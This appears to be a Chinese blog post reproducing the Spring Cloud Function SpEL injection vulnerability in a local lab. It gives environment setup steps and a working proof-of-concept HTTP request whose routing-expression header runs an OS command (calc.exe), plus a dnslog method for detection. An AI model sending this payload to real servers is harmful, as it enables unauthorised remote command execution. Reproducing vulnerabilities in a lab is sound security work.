Spring-Cloud-Function-Spel 漏洞复现

1、漏洞环境搭建

　　由于漏洞出现在前两天，原本等待vulhub出环境，直接docker 一键就ok了。但是这次vulhub好像不太及时。对于自己只能自己搭建环境了。

       找了许久，终于在唐大佬的github中找到几乎一键的方法。

　　参考链接：https://github.com/tangxiaofeng7/Spring-Cloud-Function-Spel  这里放原始链接以表示尊重。

　　无法上github的话，私信我。

　　搭建方法很简单，先安装maven  jdk 等。大佬是jdk17  我本地下载最新版本18 也是ok

　　

 

     方法如下：下载代码后，在解压目录cmd执行 mvn spring-boot:run  会下载很多库，需要耐心等待。成功后会开启8080 端口。

　 

 

 

   漏洞poc极其简单：

　　路径最好使用funtionRouter，原因自查。此环境倒是任意路径都ok。

　　

POST /functionRouter HTTP/1.1
Host: 192.168.1.7:8080
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("calc.exe")
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
  可以执行任意命令，检测的话可以使用dnslog方法。直接ping  dnslog平台。

 

　　漏洞验证：

 

版权声明：本文内容由互联网用户自发贡献，该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容， 请发送邮件至 [email protected] 举报，一经查实，本站将立刻删除。